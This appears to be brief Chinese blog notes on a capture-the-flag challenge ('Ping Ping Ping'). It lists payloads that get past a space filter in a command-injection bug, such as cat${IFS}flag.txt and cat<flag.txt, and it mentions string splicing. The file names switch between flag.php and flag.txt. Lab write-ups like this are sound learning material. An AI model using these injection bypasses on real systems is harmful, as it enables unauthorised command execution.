[GXYCTF2019]Ping Ping Ping
打开网站
测试漏洞:RCE
使用ls获得flag.php
使用cat flag.php 空格被过滤
绕过空格过滤
cat flag.txt
cat${IFS}flag.txt
cat$IFS$9flag.txt
cat<flag.txt
cat<>flag.txt
绕过字符过滤
使用字符拼接
本文来自博客园,作者:oldliutou,转载请注明原文链接:https://www.cnblogs.com/oldliutou/p/15687292.html